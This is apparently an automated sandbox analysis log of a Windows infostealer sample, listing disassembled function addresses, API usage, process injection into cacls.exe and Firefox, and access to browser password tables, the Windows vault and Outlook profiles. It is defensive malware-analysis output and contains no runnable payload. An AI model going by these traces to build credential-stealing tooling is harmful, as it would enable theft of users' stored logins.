                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014EDB192_2_014EDB19
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0B102_2_014B0B10
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156FB2E2_2_0156FB2E
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01524BC02_2_01524BC0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156EA5B2_2_0156EA5B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156CA132_2_0156CA13
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156FA892_2_0156FA89
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CFAA02_2_014CFAA0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01567D4C2_2_01567D4C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B0D692_2_014B0D69
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014AAD002_2_014AAD00
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156FD272_2_0156FD27
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B9DD02_2_014B9DD0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0154FDF42_2_0154FDF4
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C2DB02_2_014C2DB0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0155EC4C2_2_0155EC4C
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B3C602_2_014B3C60
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156EC602_2_0156EC60
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01566C692_2_01566C69
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A0C122_2_014A0C12
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014BAC202_2_014BAC20
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152EC202_2_0152EC20
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014C8CDF2_2_014C8CDF
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014CFCE02_2_014CFCE0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01537CE82_2_01537CE8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0157ACEB2_2_0157ACEB
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01549C982_2_01549C98
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0152FF402_2_0152FF40
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156FF632_2_0156FF63
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014BCF002_2_014BCF00
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01561FC62_2_01561FC6
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B6FE02_2_014B6FE0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0156EFBF2_2_0156EFBF
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014F2E482_2_014F2E48
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014D0E502_2_014D0E50
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01550E6D2_2_01550E6D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01569ED22_2_01569ED2
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A2EE82_2_014A2EE8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014B1EB22_2_014B1EB2
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_01560EAD2_2_01560EAD
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_035152233_2_03515223
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_035146883_2_03514688
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_035139483_2_03513948
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_035151053_2_03515105
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_035155BC3_2_035155BC
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DC6BB33_2_03DC6BB3
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DC6F4C3_2_03DC6F4C
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DC52D83_2_03DC52D8
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DC6A953_2_03DC6A95
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DC60183_2_03DC6018
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0375E3104_2_0375E310
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037122454_2_03712245
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0381010E4_2_0381010E
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037FE0764_2_037FE076
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037400A04_2_037400A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037527604_2_03752760
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0375A7604_2_0375A760
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_038067574_2_03806757
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037746704_2_03774670
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380A6C04_2_0380A6C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0376C6004_2_0376C600
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0374C6E04_2_0374C6E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037506804_2_03750680
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0381A5264_2_0381A526
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037504454_2_03750445
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03750B104_2_03750B10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037C4BC04_2_037C4BC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380CA134_2_0380CA13
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380EA5B4_2_0380EA5B
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380E9A64_2_0380E9A6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0374E9A04_2_0374E9A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037368684_2_03736868
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037F08354_2_037F0835
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0377E8104_2_0377E810
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037528C04_2_037528C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037668824_2_03766882
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380EFBF4_2_0380EFBF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0375CF004_2_0375CF00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03756FE04_2_03756FE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037F0E6D4_2_037F0E6D
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03770E504_2_03770E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03800EAD4_2_03800EAD
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03792E484_2_03792E48
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03742EE84_2_03742EE8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03750D694_2_03750D69
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0374AD004_2_0374AD00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03762DB04_2_03762DB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037FEC4C4_2_037FEC4C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0375AC204_2_0375AC20
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037CEC204_2_037CEC20
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03740C124_2_03740C12
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0381ACEB4_2_0381ACEB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03768CDF4_2_03768CDF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380EC604_2_0380EC60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03806C694_2_03806C69
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380F3304_2_0380F330
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037413804_2_03741380
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0373D2EC4_2_0373D2EC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380124C4_2_0380124C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0379717A4_2_0379717A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037ED1304_2_037ED130
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0373F1134_2_0373F113
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0376B1E04_2_0376B1E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037551C04_2_037551C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_038070F14_2_038070F1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0375B0D04_2_0375B0D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0378508C4_2_0378508C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037117074_2_03711707
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037FD6464_2_037FD646
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037ED62C4_2_037ED62C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380F6F64_2_0380F6F6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037C36EC4_2_037C36EC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_038075C64_2_038075C6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380F5C94_2_0380F5C9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037BD4804_2_037BD480
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0378DB194_2_0378DB19
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380FB2E4_2_0380FB2E
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380FA894_2_0380FA89
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0376FAA04_2_0376FAA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037199E84_2_037199E8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037959C04_2_037959C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037598704_2_03759870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0376B8704_2_0376B870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037C58704_2_037C5870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_038018DA4_2_038018DA
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037538004_2_03753800
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037C98B24_2_037C98B2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380F8724_2_0380F872
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037CFF404_2_037CFF40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03801FC64_2_03801FC6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380FF634_2_0380FF63
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03809ED24_2_03809ED2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03751EB24_2_03751EB2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037EFDF44_2_037EFDF4
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03759DD04_2_03759DD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0380FD274_2_0380FD27
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03807D4C4_2_03807D4C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03753C604_2_03753C60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037D7CE84_2_037D7CE8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_0376FCE04_2_0376FCE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037E9C984_2_037E9C98
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035CEDDD4_2_035CEDDD
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035CE2234_2_035CE223
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035CE1054_2_035CE105
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035CD6884_2_035CD688
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035CE5BC4_2_035CE5BC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035CC9484_2_035CC948
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03785050 appears 36 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 037BE692 appears 86 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0373B910 appears 272 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 037CEF10 appears 105 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03797BE4 appears 96 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: String function: 014E5050 appears 36 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: String function: 0152EF10 appears 105 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: String function: 014F7BE4 appears 95 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: String function: 0149B910 appears 268 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: String function: 0151E692 appears 86 times
                Source: Pp7OXMFwqhXKx5Y.exe, 00000000.00000002.178882763555.0000000005D50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000000.00000002.178879281295.0000000004319000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000000.00000002.178878300417.0000000003350000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000000.00000002.178883781428.00000000078B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.000000000159D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.000000000101E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exeBinary or memory string: OriginalFilenametHrl.exe0 vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Pp7OXMFwqhXKx5Y.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, p1UHuFOvEAowV6fk4b.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, p1UHuFOvEAowV6fk4b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, PYwgDUyCfG3xhOjec2.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, PYwgDUyCfG3xhOjec2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, PYwgDUyCfG3xhOjec2.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, PYwgDUyCfG3xhOjec2.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, PYwgDUyCfG3xhOjec2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, PYwgDUyCfG3xhOjec2.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, p1UHuFOvEAowV6fk4b.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, p1UHuFOvEAowV6fk4b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/15
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Pp7OXMFwqhXKx5Y.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\cacls.exeFile created: C:\Users\user\AppData\Local\Temp\G8uE-69OLJump to behavior
                Source: Pp7OXMFwqhXKx5Y.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Pp7OXMFwqhXKx5Y.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cacls.exe, 00000004.00000002.182792565138.00000000081E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: cacls.exe, 00000004.00000003.179407798051.000000000318B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182789173794.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179407998733.00000000031AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: cacls.exe, 00000004.00000003.179416057961.0000000008238000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182792565138.0000000008244000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: Pp7OXMFwqhXKx5Y.exeReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess created: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess created: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Pp7OXMFwqhXKx5Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
